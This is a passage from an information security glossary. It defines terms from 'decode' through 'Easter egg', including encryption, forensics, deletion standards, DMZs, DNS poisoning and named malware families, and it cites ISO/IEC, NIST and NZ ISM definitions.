administrative decision is made to formally authorise its release into the
public domain” (NZ information Security Manual).
See also redaction.
|
|
Decode
|
Convert coded
messages into their plaintext
equivalents, if necessary using the correct section, page and entries in a code book.
|
|
Decrypt,
decryption,
decipher, decipher
|
Reversal of the encryption process requiring the correct key to recover the
original plaintext
from the cyphertext
(where possible).
|
|
Decryptor
|
Some early ransomware
had cryptographic
design flaws or coding bugs, allowing encrypted files
to be decrypted
using utilities released by antivirus
companies without victims
having to pay the ransom.
Most current ransomware is better designed and coded, making encrypted files
useless without the necessary decryption key.
|
|
Deduplication
|
Reduction or elimination of redundant information. “Method
of reducing storage needs by eliminating redundant data, which is replaced
with a pointer to the unique data copy. Note: Deduplication is sometimes
considered a form of compression” (ISO/IEC 27040).
|
|
Deep
cover
|
Infiltrating
a target organisation
so effectively that the infiltrator becomes highly trusted and may gain privileged access to its innermost secrets, albeit
increasing the risk
of the agent being
turned or going native.
See also mole and sleeper.
|
|
Deep
fake
|
Advanced audio-visual techniques can ‘put words into the
mouths’ of celebrities, politicians, activists and adversaries, making them appear
to express something they did not. Just as written materials can be edited
or fabricated, small changes to genuine audio-visual content (such as
deleting the word “not” or changing a frown into a smile) are relatively easy
to make seamlessly, yet can dramatically affect the meaning or interpretation
of, say, a political speech or public statement. As the techniques advance
through artificial intelligence, neural networks and deep learning,
wholescale changes are becoming easier to make and harder to spot,
potentially leading to de novo fabrication of lengthy video clips in
fake settings with fake audiences. There are serious implications for
society through large-scale social engineering such as fake news, fraud, espionage, information warfare and cyberwar,
threatening forensics,
authority, accountability
and trust.
|
|
Deep packet inspection
|
Third generation firewalls can examine the payloads (data content) of network packets, as well as
the IP addresses and protocol
information
in the packet headers, in order to apply more granular security rules. Their ability to access the content of network traffic
raises privacy
and confidentiality
concerns: these are trusted
devices.
|
|
Deep
Web, Deepweb,
Deep net, Deepnet
|
Internet
sites and services that are not readily accessible and searchable using
conventional search engines such as Google. Includes the Darknet, plus web pages and servers protected behind
corporate firewalls.
|
|
Defame,
defamation,
defamatory
|
Stating or implying something false that unduly harms the
image and reputation
of another person. Note that a true i.e. factually accurate
statement, by definition, is not defamatory though it may be distinctly
uncomplimentary. See also libel
and slander.
|
|
Default
|
Pre-set configuration. Straight out of the box,
newly-installed software
and hardware
typically has standardized and convenient but relatively weak security settings,
for example passwords
that are widely known in the hacker
community, and pass-all settings.
|
|
Default
deny,
need-to-know
|
Access
control principle
stating that information
should only be released to authenticated
individuals if they have a legitimate
purpose or reason for using the information, and are authorized to do so.
|
|
Default
permit,
need-to-withhold
|
Access
control principle
stating that information
should normally be released or disclosed
unless such access
needs to be explicitly denied for some specific, legitimate reason.
|
|
Defect
|
An identified bug,
flaw or other
inherent issue with a system,
process, person, organisation etc.
|
|
Defence-in-depth
|
Control
principle
whereby multiple overlapping or complementary ‘layers’ of protection are applied, all of which
would have to be breached,
overcome, disabled or bypassed in order to impact or compromise the protected information assets.
This is a structured, systematic approach, more than simply increasing the
number of controls. “A layered combination of complementary
countermeasures” (Official ISC2 Guide to the CISSP CBK, 2007, page
282).
|
|
Defensive security,
passive security,
reactive security
|
Security
practices that deter,
prevent,
react or respond to attacks
and other incidents,
generally by minimizing vulnerabilities
and/or impacts
for instance using silent
alarms, tell-tales
or whistleblower’s
hotlines coupled with highly efficient incident response practices to react
quickly and decisively to the very earliest signs of trouble. Cf. offensive security.
|
|
Defraud
|
To commit or perpetrate fraud.
|
|
Degauss
|
Secure
erasure process
that applies an extremely strong magnetic field to magnetic data storage media
such as computer disks or tapes to destroy the stored data. In addition to
concerns over the equipment and operating procedures, the extremely high
density of modern magnetic storage methods,
high coercivity
of the materials, and use of RAID and similar redundant storage/error correction techniques makes
degaussing less reliable in practice than it may appear, although subsequent
physical destruction
of degaussed media increases assurance.
“Render data unreadable by applying a strong magnetic field to the media”
(ISO/IEC 27040).
|
|
Degausser
|
A device
that degausses.
“An electrical device or permanent magnet assembly which generates a
coercive magnetic force to destroy magnetic storage patterns in order to
sanitise magnetic media.” (NZ information Security Manual).
|
|
Delegated authority,
delegation
|
Refers to someone passing some of their responsibility
and power to a subordinate within specified parameters, for example giving
them the ability to sign-off (authorize)
expenses claims or procurement orders up to a certain dollar value. Implies
a level of trust
in the subordinate, often supported by additional controls. While the
authorized person is personally accountable for any incidents arising from their actions and
inactions, the more senior person generally shares some of the accountability
since he/she made the decision to delegate.
|
|
Deletion,
disposition mechanism, erasure,
destruction,
destruction of data storage media,
anonymisation of data
|
“Process by which PII is
changed in an irreversible manner so that it is no longer present or
recognizable and cannot be used or reconstructed after the process. Notes:
(1) As a rule, “secure deletion” is required. Secure deletion means that
reconstruction of the data is either impossible or requires substantial
effort (in human resources, means, time). For selecting the deletion methods,
the need for protection of the data concerned is to be taken into account;
(2) Equally, an alternative way to reach the goal of deletion is
anonymisation. Further guidance on anonymisation (as a de-identification
technique) can be found in ISO/IEC 20889:2018-11 (1st edition) — Privacy
enhancing data de-identification terminology and classification of
techniques; (3) the term ‘deletion’ covers all such synonyms: disposition
mechanism, erasure, destruction, destruction of data storage media,
anonymization of data.” (ISO/IEC 27555 draft).
|
|
Deletion
class
|
“Combination of a standard
deletion period and an abstract starting point for the period run. Note: All
clusters of PII which are subject to the same deletion period and the same
abstract starting point are combined in a deletion class. As opposed to the
(specific) deletion rule for a cluster of PII, the (abstract) deletion class
relates only to the abstract starting point and not to a specific condition
for the start of the period run (see also [clause] 8).” (ISO/IEC 27555 draft).
|
|
Deletion framework
|
“Policy documents and
implementation mechanisms by means of which a PII controller ensures that its
pools of personally identifiable information are deleted in accordance with
the applicable legislation and/or regulation.” (ISO/IEC 27555 draft).
|
|
Deletion
period
|
“Time period after which a
specific cluster of PII should be deleted. Note: As a generic term, the
deletion period comprises all deletion periods. This includes the
→standard deletion periods and the →regular deletion periods,
which form special groups. However, the term also includes, for instance, the
specific deletion periods for some clusters of PII or deletion periods in
special cases. For details see Clause 7.” (ISO/IEC 27555 draft).
|
|
Deletion
rule
|
“Combination of deletion
period and specific condition for the starting point of the period run” (ISO/IEC 27555 draft).
|
|
Demand letter
|
See cease
and desist letter.
|
|
De-militarized zone
|
See DMZ.
|
|
DEP
(Data Execution
Prevention)
|
Operating
system security feature intended to prevent pages in memory that
happen to contain executable code from actually being executed unless
they have been explicitly designated executable by resetting the NX (No
eXecute) bit. Helps prevent buffer overflow and similar attacks.
|
|
Dependable,
dependability
|
Measure of the extent to which a system, network, person, team, organisation etc.
can be relied upon or trusted
to perform as expected under all anticipated and ideally unanticipated
circumstances. Implies a level of assurance as to the suitability and effectiveness
of its resilience,
recoverability
and contingency
preparations, and clarity of the requirements.
|
|
Deposition
|
Legal process requiring someone in court under oath to
provide immediate verbal answers to verbal questions. A form of discovery. See
also interrogatory.
|
|
Deprecated
|
Withdrawn and no longer recommended for use. If
significant flaws
are discovered in cryptosystems,
for instance, the corresponding standards,
algorithms, protocols etc.
are, at some point, removed from service and superseded – hopefully –
by better ones.
|
|
Derived
measure
|
“Measure that is defined as a function of two or
more values of base measures” (ISO/IEC 15939:2007).
|
|
DES
(Data Encryption
Standard)
|
Standard
specifying a cryptographic
algorithm (DEA - Data Encryption Algorithm)
for US government use in 1977, published in FIPS PUB 46. Still used by
legacy systems,
albeit normally in the somewhat more secure form of triple-DES. Vulnerable to brute-force attacks with a key length constrained by the standard to
56 bits rather than the maximum of 64, hence DES is deprecated.
|
|
Design
|
(a) Distinctive physical expression, shape or other
characteristics of a product that is typically associated with a particular brand or trademark. (b)
Systematic process of analysing requirements, then creating and documenting
something to satisfy those requirements. (c) A structured and documented
architecture.
|
|
Destruct,
destroy
|
Physically
and/or logically obliterate information such that it is no longer recoverable
in usable form, even using forensic techniques. In some
circumstances, the process may further involve erasing any trace of its prior
existence (e.g. deleting associated metadata). “Sanitize using physical
techniques that make recovery infeasible using state of the art laboratory
techniques and results in the subsequent inability to use the media for
storage of data. Note: Disintegrate, incinerate, melt, pulverize, and shred
are destruct forms of sanitization” (ISO/IEC 27040). Note:
“destroy” is the correct English verb form, whereas “destruct” is an
Americanism derived from “destruction”. See also purge.
|
|
Destruction
|
The act of destroying.
“Result of actions taken to ensure that media cannot be reused as
originally intended and that information is virtually impossible or
prohibitively expensive to recover” (ISO/IEC 27040).
|
|
Detect
|
“Develop and implement appropriate activities to
identify the occurrence of a cybersecurity event. The Detect Function
enables timely discovery of cybersecurity events.” (NIST
Cybersecurity Framework). A core function within NIST’s
cybersecurity framework along with identify, protect, respond and recover.
|
|
Detective
control
|
Form of security control intended to detect an incident in
progress, log the
details and/or raise an alert
or alarm to
trigger the appropriate response.
See also preventive
and corrective
control.
|
|
Deterrent
|
Form of preventive control such as warnings and
penalties intended to deter (that is, reduce the threat) of compromise or attack.
|
|
Development
environment
|
Computer environment comprising systems, networks, devices, data and supporting processes that are used by software
developers for developing new application
systems. Cf. production
or test
environments.
|
|
Device
|
An item of computing or networking equipment, a piece of ICT hardware or electronic technology, or
more generally a machine or method
with a specific purpose. Many devices also qualify as things or small systems.
|
|
Device access control software
|
Program restricting the use of communications ports and/or
equipment (e.g. USB flash memory sticks) on a system. “Software that can be
installed on a system to restrict access to communications ports on
workstations. Device access control software can either block all access to a
communications port or allow access using a whitelisting approach based on
device types, manufacturer’s identification, or even unique device
identifiers” (NZ information Security Manual).
|
|
DevOps
(Development – Operations integration)
|
Software engineering approach integrates application development, testing and ICT operations
functions/teams and automates processes primarily to cut cycle times for software updates
from months to hours. A practical extension of Agile development, a form of RAD, and other continuous development methods. See also DevSecOps.
|
|
DevSecOps
(Development – Security –Operations
integration)
|
Extension of DevOps
to integrate software development, testing, software/infrastructure security
and ICT operations teams. Extensive process automation speeds things up,
improves repeatability and is well suited to cloud computing (e.g. automatically
provisioning virtual
systems, installing and configuring applications, and validating the installations including
the security aspects).
|
|
Dexter
|
One of several species
of memory-scraping
Point-of-Sale system malware discovered in the wild in 2012
|
|
Dharma
|
One of several species
of ransomware
in the wild in
2019 that strongly encrypts
victims’ data, coercing them into
paying a ransom
for the decryption
keys. Targets small organisations,
demanding ransoms
of about $1k.
|
|
DHS
(Department of Homeland Security)
|
Spooky
US government agency responsible for intelligence and surveillance in support of defense,
counter-terrorism,
critical national
infrastructure protection etc. See also FBI and CIA.
|
|
Dialler
|
Old-skool form of malware which silently calls a premium
rate phone number on the victim’s
modem, committing toll fraud.
See also war dialler.
|
|
Dictionary
attack
|
Cryptanalytic
attempt to guess or crack
a password
using words from the dictionary, in various combinations (e.g. forwards,
backwards, with numbers prepended or appended, with punctuation). A more
sophisticated form of brute
force attack.
|
|
Dieselgate
|
An assurance
and ethics
scandal involving the deliberate programming of VW diesel cars to detect and
respond to emissions testing in progress, cutting exhaust emissions to ace
the test but increasing emissions under normal operating conditions. A sign
of things to come, perhaps, as everyday objects are smartened-up, becoming things capable
of evading dumb checks and controls.
|
|
Differential backup
|
A backup
of all the files created or changed since the last image backup. In contrast to incremental backups,
a system can be
recovered simply by restoring the most recent image and differential
backups. However, differentials contain more data, hence they take longer to write and
use more storage, than most incrementals.
|
|
Diffie-Hellman groups
|
“A method used for specifying the modulus size used in
the hashed message authentication code algorithms. Each DH group represents a
specific modulus size. For example, group 2 represents a modulus size of
1024 bits” (NZ information Security Manual).
|
|
Digest
|
See hash.
|
|
Digital certificate
|
File containing information about a user or system along with their public key plus
a digital
signature from the Certification
Authority to authenticate
the certificate itself and to some extent (according to the nature and extent
of the checks performed) the user or system to whom it was issued.
|
|
Digital
device
|
“Electronic equipment used to process or store digital
data” (ISO/IEC
27037).
|
|
Digital
evidence
|
Forensic
evidence in the form of data
(e.g. the contents of a hard drive, tablet, smartphone or USB memory stick) gathered
in connection with investigating, proving or disproving a crime. “Information
or data, stored or transmitted in binary form, that may be relied on as
evidence” (ISO/IEC
27037).
|
|
Digital evidence copy
|
In order to guarantee the integrity of digital evidence,
forensic analysis is performed on evidential copies that have been produced
by appropriate methods and can be verified correct. “Copy of the digital
evidence that has been produced to maintain the reliability of the evidence
by including both the digital evidence and verification means where the
method of verifying it can be either embedded in or independent from the
tools used in doing the verification” (ISO/IEC 27037).
|
|
Digital Evidence
First Responder (DEFR)
|
“Individual who is authorized, trained and qualified to
act first at an incident scene in performing digital evidence collection and
acquisition with the responsibility for handling that evidence. Note:
Authority, training and qualification are the expected requirements necessary
to produce reliable digital evidence, but individual circumstances may result
in an individual not adhering to all three requirements. In this case, the
local law, organisational policy and individual circumstances should be
considered” (ISO/IEC
27037).
|
|
Digital
Evidence Specialist
(DES)
|
“Individual who can carry out the tasks of a DEFR and has
specialized knowledge, skills and abilities to handle a wide range of
technical issues. Note: A DES may have additional niche skills, for example,
network acquisition, RAM acquisition, Linux or Mainframe knowledge.” (ISO/IEC 27037).
|
|
Digital
forensics,
cyber forensics,
computer forensics
|
The forensic
analysis of digital
evidence. Strictly speaking, evidence may be obtained from
various devices
and things
besides computers, while computing is usually - but not necessarily -
digital.
|
|
Digital investigation
|
“Use of scientifically derived and proven methods
towards the identification, collection, transportation, storage, analysis,
interpretation, presentation, distribution, return, and/or destruction of
digital evidence derived from digital sources, while obtaining proper
authorizations for all activities, properly documenting all activities,
interacting with the physical investigation, preserving digital evidence, and
maintaining the chain of custody, for the purpose of facilitating or
furthering the reconstruction of events found to be incidents requiring a
digital investigation, whether of criminal nature or not” (ISO/IEC 27043).
Wow! See also digital
forensics.
|
|
Digital signature
|
Cryptographic
hash of a message
or file, constructed with the sender’s private key, used to ‘seal’ the
message/file thus enabling any subsequent changes to be identified and so authenticate
both the message and the sender (giving non-repudiation).
|
|
Digital storage medium
|
“Device on which digital data may be recorded” (ISO/IEC 27037,
adapted from ISO/IEC 10027).
|
|
[Data]
Diode
|
“A device that allows data to flow in only one
direction” (NZ information Security Manual).
|
|
Dip
|
Momentary/transient reduction in supply voltage, lasting a
few micro- or milliseconds. Most dips pass without incident, but electronic systems with insufficient voltage
regulation may fail. See also brownout,
spike, surge and blackout.
|
|
Direct
evidence
|
Forensic
evidence that derives from or is closely related to an incident. Cf.
circumstantial
evidence.
|
|
Disaster
|
A terrible incident
such as a major fire,
flood, fraud or hack. Distinguished
from ordinary events, incidents or crises
by its severity, scale and impact.
|
|
[IT] Disaster Recovery
(DR)
|
Fallback arrangements to restore IT systems, data and services supporting critical
business functions from backups,
often at an alternative location using cloud-based or mobile IT facilities,
following a major incident
affecting the primary ICT
production
facilities.
|
|
Disaster Recovery
Plan (DRP)
|
Documentation
of an organisation’s
DR arrangements.
|
|
Disclaimer
|
Attempt to share
risk by explicitly and expressly denying responsibility for something. Often used
in an attempt to limit legal liabilities. See also notification.
|
|
Disclosure
|
Revelation of confidential information. May be deliberate or accidental, forced
(e.g. by coercion,
blackmail or social engineering)
or voluntary, whether authorized
and permitted or unauthorized
and forbidden.
See also discovery.
|
|
Discovery,
disclosure
|
Forensics
term for the enforced
disclosure of
evidence to the
counterparty in an official investigation or court case. A strong reason to
limit the collection and storage of information whose very existence might
prove embarrassing or damaging to the organisation or individuals concerned (e.g. risk assessment
results or audit
recommendations that were not taken seriously). “Process by which each
party obtains information held by another party or non-party concerning a
matter. Note: Discovery is applicable more broadly than to parties in
adversarial disputes. Discovery is also the disclosure of hardcopy documents,
Electronically Stored Information and tangible objects by an adverse party.
In some jurisdictions the term disclosure is used interchangeably with
discovery.” (ISO/IEC
27050-1). See also disclosure, deposition, interrogatory and subpoena.
|
|
Discretionary
|
Optional i.e. provided, used or configured
according to someone’s discretion, choice or freewill. Usually refers to IT security controls that are
not mandatory.
|
|
Discretionary Access Control
(DAC)
|
Decisions on whether and how to control access to data can be made by the users of a DAC system using their discretion,
as opposed to being coded irrevocably into a MAC system as an inherent part of its
technical architecture.
|
|
Discussion
forum, forum,
discussion group, group,
email reflector
|
Social
networking discussion facility. Messages sent to the group by a
member through email
or the website are automatically ‘reflected’ back to all members by email and
(usually) archived on the website allowing them to be searched. Messages
containing sensitive
or inappropriate content (e.g. intended for a specific group
member or someone else entirely) or spam
may be circulated in exactly the same way, while shared information may be exploited by social engineers.
|
|
Dishonest
|
Someone ‘ethically
challenged’ who lies, deceives,
cheats or defrauds others for
their own benefit. They cannot be relied upon, making them untrustworthy
and probably unworthy of or unsuitable for various privileges and responsibilities.
|
|
Disinfect
|
Eliminate a malware
infection from a system,
normally by deleting the malicious
software from wherever it is stored and (hopefully!) improving the security controls to prevent
re-infection. “To remove malware from within a file” (NIST SP800-114 rev1).
|
|
Disinformation
|
See misinformation.
|
|
Disintegrate
|
Fall to pieces or rip asunder. “Destruct by separating
media into its component parts” (ISO/IEC 27040).
|
|
Disk
image
|
(a) Copy of the data
on a disk, typically created by an image
backup. (b) In computer
forensics, a bit-copy
of the entire contents of a disk or other storage medium using approved hardware, software and processes. (c) In virtualisation,
a virtual disk made available to a guest operating system by the hypervisor.
|
|
Disk
mirroring,
RAID
(Redundant Array of
Inexpensive Devices)
|
Technique in which data are simultaneously written to and read from
multiple disks, usually for resilience
and/or performance reasons. Various technical configurations are possible
with different advantages, disadvantages, capabilities and information risks.
|
|
Disposition
|
Eventual outcome or result of something. “Range of
processes associated with implementing records retention, destruction or
transfer decisions which are documented in disposition authorities or other
instruments” (ISO 30300:2011).
|
|
Diversity
|
Use of, or at least ready access to, alternative,
independent services, sources, vendors, pieces of equipment, power sources,
communications routes etc. in order to reduce the risk of failure of any one. A resilience control.
Unanticipated dependencies between apparently diverse resources can create single points of failure
and hence additional risks. See also redundancy and mirror site.
|
|
Division of responsibilities,
separation of duties,
segregation of duties
|
Control
requiring the involvement of more than one individual or organisation
to complete a business process
e.g. a member of staff enters data but someone else, normally a
supervisor or manager,
must review and authorize it for
processing. Normally reinforced by controlled access to the corresponding system functions.
Reduces the possibility of fraud,
barring collusion
between the individuals or coercion,
and data entry errors.
“Practice of dividing steps in a function among different individuals so
as to keep a single individual from being able to subvert the process.” (PCI Card Production and Provisioning Physical
Security Requirements, v2.0 January 2017).
|
|
DLP
(Data Leakage
[or Loss] Prevention)
|
Security technology designed to monitor, identify, log/alert and if appropriate block the inappropriate transfer of confidential information through
a network port or firewall, for
example to prevent workers,
malware or hackers disclosing
or passing personal
information, credit card numbers, trade secrets or other intellectual property to third parties
through the Internet,
whether by accident
or on purpose. Conceptually similar to IDS/IPS but concerns extrusion rather than intrusion.
|
|
DMCA
(Digital Millennium
Copyright Act)
|
US law prohibiting technologies/devices that may be used to bypass or
defeat software/hardware copy protection
mechanisms.
|
|
DMZ
(De-Militarized
Zone),
screened subnet
|
Special network
segment
between external
networks such as the
Internet and internal
corporate networks, within which proxy servers and firewalls are intended to identify and
restrict unauthorized
traffic while passing legitimate
traffic. Systems
that need to connect to the Internet (such as Web servers, DNS servers, application servers or front-ends, and email servers) are
typically located in the DMZ, and are hardened. “Perimeter network
(also known as a screened sub-net) inserted as a ‘neutral zone’ between
networks” (ISO/IEC
27033-1). “A small network with one or more servers that
is kept separate from an agency’s core network, either on the outside of the
agency’s firewall, or as a separate network protected by the agency’s
firewall. Demilitarised zones usually provide public domain information to
less trusted networks, such as the Internet” (NZ information Security Manual).
See also zone.
|
|
DNS
(Domain Name System)
|
Network
protocols and systems let us refer
to Internet
nodes by memorable domain names (such as Amazon.com) rather than their
numeric IP addresses (such as 13.32.145.86).
|
|
DNSpionage
|
Species of RAT malware in the wild in
2019. Uses DNS tunnelling to communicate with the attacker’s C&C
systems.
|
|
DNS
[cache] poisoning
|
Attack
that subverts DNS systems or records
to direct victims
covertly to a malicious domain,
phishing or infectious
website etc. instead of the benign
one they anticipated e.g. by ‘poisoning’ cached DNS data with false
linkages or by exploiting
the ‘zone transfer’ process used to pass data between DNS servers. See also pharming.
|
|
Document,
documented,
documentation
|
Implies that something (such as a policy, process or plan) is sufficiently stable
and understood that it can be written down (‘captured’), and if appropriate
then reviewed and
approved by other stakeholders.
To have any value and avoid becoming shelfware, documents must be accessed, read and
implemented or used, which is where awareness, training, compliance, reinforcement and/or enforcement
activities come into play, along with quality factors such as the reading
level, clarity, interest etc. Changes to important documentation also
need to be managed to ensure it remains aligned with the subject, relevant,
complete and accurate (an integrity
control).
|
|
Documented information
|
See document.
“Information required to be controlled and maintained by an organisation
and the medium on which it is contained. Notes: documented
information can be in any format and media and from any source; documented
information can refer to the management system, including
related processes, information created in order for the organisation
to operate (documentation), [and/or] evidence of results achieved (records).”
(ISO/IEC 27000).
|
|
Domain
owner
|
“A domain owner is responsible for the secure
configuration of the security domain throughout its life-cycle, including all
connections to/from the domain” (NZ information Security Manual).
|
|
Domain
slamming
|
An unethical
and barely legal social
engineering scam
to trick the registered owners
of domains into transferring their registrations to a different fee-charging
registrar, believing they are merely renewing.
|
|
Domotics
|
Neologism derived from domus (Latin for home)
and robotics or informatics, meaning home automation, IoT and smart homes in
particular.
|
|
Dongle
|
Copy
protection hardware
device used to
‘unlock’ (i.e. permit
access to and use
of) software on
the particular computer into which it is physically plugged. Also, a hardware
authentication
token. Both forms
normally use cryptography
and tamper
resistance to prevent the devices being illicitly duplicated or
fabricated, but the corresponding applications
may be vulnerable
to hacking,
bypassing or negating the protection.
|
|
Door
open alarm
|
Physical
security arrangement that monitors an access-controlled door, triggering an alarm if it is opened
(e.g. opening an emergency fire exit may sound the fire alarm to
evacuate the building) or held open much longer than it would take even the slowest
person to pass through (e.g. a card access controlled office door
propped open for some reason may sound an annoying local ‘peeper’ and/or a
silent/remote alarm in the security guard house). Electronic door open
alarms may be manually overridden or silenced for authorized purposes such as office moves
or refits, but such overrides should preferably trigger indicators (such as a
flashing warning light), automated reminders or cancellation/time-outs to
prevent them being forgotten and left in effect beyond the allotted time.
|
|
Dorkbot
|
Windows malware
in the wild
from 2011 to 2016. RAT
spread via infectious
websites (including Jamie Oliver’s), social networks, IM and USB devices, delivering various payloads including bank Trojans, keyloggers and DDoS engines. The botnet’s command-and-control
structure was disrupted by the authorities with assistance from technology
companies in 2016.
|
|
DoS
(Denial of Service)
|
Type of information
security incident
in which availability
is impacted, for
example by deliberately or accidentally
overloading the system
or network,
thereby interfering with legitimate
business use. “Prevention of authorized access to a system resource or
the delaying of system operations and functions, with resultant loss of
availability to authorized users” (ISO/IEC 27033-1). See also DDoS and DRDoS.
|
|
Double
agent
|
An agent
who surreptitiously remains loyal to and acts in the interests of one party
while giving the appearance of loyalty towards another. A form of sabotage or cybertage.
|
|
Double
extension
|
Operating
systems and applications
often determine a file’s type according to the final extension on its name,
preceded by a period (e.g. files containing executable programs
often end with .exe). Systems may not display the extension for known
file types. Additional periods and characters preceding the final extension
(such as .txt.exe) may be treated as part of the file name. Some malware uses this
and other social
engineering techniques to fool victims, for instance an email might entreat the user to “open the attached text file
containing a disputed invoice”, whereas the attachment is actually a malicious program
that executes when the victim opens it.
|
|
Double-entry bookkeeping
|
Accountancy process
used since Roman times in which every transaction is recorded as a
complementary pair of credits and debits (equal in value but opposite in
sign) in the relevant accounts. Any discrepancy between the running totals
of the paired accounts when they are reconciled generally indicates a simple data-entry or
calculation error
but could point to fraud
or theft.
|
|
Downloader
|
Form or component of malware which downloads additional code
(usually the payload)
from the Internet.
This arrangement allows criminals to change the malware dynamically, for
example to evade antivirus
software, attack
specific new targets
or extend previous attacks. See also fileless malware.
|
|
Downstream
|
“Handling processes and movements of products and
services that occur after an entity in the supply chain takes custody of the
products and responsibility for services” (ISO/IEC 27036-1).
|
|
Dox, DoX,
doxing, DoXing
|
Leet
terms derived from “docs” (documents),
referring to the process
of illicitly gathering and perhaps disclosing personal information on targets by researching their presence on social media
and other sources such as hacked
personnel databases.
Has harassing,
bullying or threatening
overtones of coercion,
similar to stalking, grooming, snooping,
spying and other
forms of social
engineering.
|
|
DoXware, doxware
|
See leakware.
|
|
DP
|
See data
processing.
|
|
DR
|
See disaster
recovery.
|
|
Dragonfly
|
See SAE.
|
|
Draining,
infiltration
|
The ‘urban sport’ of exploring insecure drains, service
ducts and other voids
as a means of bypassing physical
perimeter controls in order
to gain unauthorized
access to sites
and buildings. A risky,
dangerous form of trespass
and a significant though underappreciated risk for many otherwise secure
places.
|
|
DRDoS
(Distributed Reflective
Denial of Service)
|
Some DDoS
attacks use UDP
rather than TCP, taking advantage of UDP servers (such as DNS servers) to amplify the volume of
traffic, and IP address spoofing
to forward the amplified responses to a victim’s system rather than back to the
originator. It is nothing to do with DR-DOS, a PC operating system from
Digital Research.
|
|
Dridex,
Bugat,
Cridex
|
A multifunctional evolving antivirus-evading malware with botnet, bank Trojan and ransomware capabilities. The FBI tried to disrupt
the Dridex infrastructure by blackholing
C2
traffic in 2016 but it remained active in the wild in 2019. In December 2019, two
alleged Russian members of Evil Corp (the cybercriminal gang behind Dridex),
were indicted for their part in stealing ~$70m from organisations around the
globe.
|
|
Drive-by
download,
Web-inject malware
|
Mode of malware
infection
involving the user
merely browsing to an infectious website where vulnerabilities in the browser software are
silently exploited,
usually without the user even being aware of the compromise.
|
|
Driver
pins
|
In most physical locks, these standard-length metal
cylinders are pushed back against springs into the hull by the variable-length key pins when a key is inserted into
the keyway.
Provided the key pins and driver pins meet along a straight shear line due to
the correct key having been inserted, the plug can be rotated at the shear line to
open or close the lock.
|
|
DRM
(Digital Rights Management or Digital Restriction
Measures)
|
Cryptographically-based
access controls
used to permit or
deny certain types of use of intellectual
property according to the owner’s
wishes, potentially exceeding the constraints available under copyright law (e.g. fair use can be
prevented through technical means).
|
|
Drone,
UAV
(Unmanned Autonomous Vehicle)
|
Unmanned aircraft, normally used for remote surveillance.
Basic drones (toys) are controlled by human operators nearby, while
sophisticated military versions (UAVs) may operate semi-autonomously using GPS and intelligent control systems to complete
surveillance or attack
missions across immense distances. Raises safety and privacy concerns.
|
|
Drop,
dead drop,
Dead Letter
Box
(DLB)
|
Physical or electronic location where messages, parcels,
files etc. may be safely (anonymously, secretly and asynchronously)
delivered to a collector,
competitor, spy
or criminal hacker/cracker. Modern
day spies may use anonymous
Internet
services, encryption,
steganography and covert channels
to pass information
but still rely on dead drops to pass physical assets such as One Time Pads, goods purchased with
stolen credit card numbers, and good ol’ fashioned cash. See also live drop.
|
|
Dropper
|
Malware which delivers/contains, unpacks
and installs other malware on an infected system.
See also downloader.
|
|
DROWN
(Decrypting RSA with Obsolete and Weakened
eNcryption)
|
Contrived name for a hack that compromises TLS sessions by exploiting a vulnerability in the deprecated SSL v2 protocol, exposing RSA private keys. See also POODLE and Heartbleed.
|
|
DTSA
(Defend Trade Secrets Act)
|
US federal law provides some legal protection for confidential
proprietary information
classed as trade
secrets, supplementing state laws and harmonizing the approach.
|
|
Dual-control
|
Form of control
requiring the actions of more than one person, for example when two soldiers
have to insert and turn their keys
at the same moment into locks
placed several meters apart in order to launch a missile.
|
|
Dual
stack device
|
“A product that implements both IP version 4 and 6
protocol stacks” (NZ information Security Manual).
|
|
Dual-use
|
Technology that can be used for both offensive and
defensive security purposes, to wage war and to secure peace. Strong encryption, for
instance, protects information and communications regardless of the nature of
the information and the communicating parties: it is valued and used by
criminals, terrorists, the authorities including governments, militia and law
enforcement,
and the public alike.
|
|
Due
care
|
Obligation
or expectation that fiduciary
officers/executives
of an organisation
duly protect its
assets and act in
its best interests, just as a prudent person would be expected to do. “The
responsibility that managers and their organisations have a duty to provide
for information security to ensure that the type of control, the cost of
control, and the deployment of control are appropriate for the system being
managed” (NIST
SP 800-30). See also negligence. Cf. due diligence
and duty of care.
|
|
Due
diligence
|
Assurance
activities in preparation for important corporate activities such as mergers,
acquisitions and the execution
of major contracts.
Also compliance
e.g. enforcing policies
and ensuring that security
controls are effectively protecting valuable information assets.
Cf. due care
and duty of care.
|
|
Dump
|
Data
file containing authentication
credentials
such as usernames
and passwords
or credit/bank card numbers and related information such as the cardholder’s name
and the CVV,
possibly fullz,
stolen by a hacker
or carder then
made available on the hacker
underground.
|
|
Duqu
|
APT
worm similar to and
perhaps derived from Stuxnet.
|
|
Duress
alarm,
duress button
|
Type of silent
alarm that can be triggered by a worker to signal that they are
experiencing some form of duress (coercion, threat, hold-up,
robbery etc.), typically by hitting a concealed ‘panic button’,
releasing a dead-mans-handle or entering a particular combination of keys (such as their
normal password
or PIN code
immediately preceded or followed by, say, the hash symbol) into a system that has been
specifically designed
and configured to incorporate this facility (such as a bank teller’s
workstation or security
guard station).
|
|
Duty
of care
|
A responsibility,
obligation,
duty, requirement or expectation to ensure that others are not harmed by
one’s action or inaction. Cf. due care, due diligence.
|
|
Dyre
|
A bank
Trojan capable of man-in-the-middle attacks, monitoring online banking sessions to capture
browser snapshots and logon
credentials.
Discovered in 2014.
|
|
EAL
(Evaluation Assurance Level)
|
An assurance
metric indicating
the depth and rigor to which secure ICT
products are evaluated against the Common Criteria. EAL 1 is the simplest,
most basic level, EAL 7 the most advanced. “Set of assurance requirements
that represent a point on the Common Criteria predefined assurance scale”
(CNSSI-4009).
“A level of assurance in the security functionality of a product gained
from undertaking a Common Criteria evaluation. Each EAL comprises a number
of assurance components, covering aspects of a product’s design, development
and operation” (NZ information Security Manual).
|
|
EAM
(Enterprise Asset Management)
|
Structured and often software-assisted processes to manage corporate assets (generally
just physical assets such as buildings, machinery/plant, vehicles and
infrastructure) from acquisition to disposal, including preventive
maintenance and repair activities.
|
|
EAP
(Emergency Action Plan)
|
A plan to help people survive life-threatening emergency
situations or crises such as active shooters, holdups, attacks by terrorists or criminal gangs, bomb
threats or blasts, or natural disasters.
Such events may
occur suddenly without warning, hence the EAP and associated exercises aim to
help by preparing people for the possibility and practicing their responses (e.g. evacuate,
hide or defend yourself).
|
|
Easter
egg
|
A Trojan
horse function hidden within an otherwise legitimate program. Although normally benign (such as a
simple computer game or audio-visual tribute to the programmers), the fact
that a covert
function has been coded and passed through program testing hints at a
possible governance
issue with the SDLC,
begging the question “What else might be going on in there?”. “Hidden
functionality within an application program, which becomes activated when an
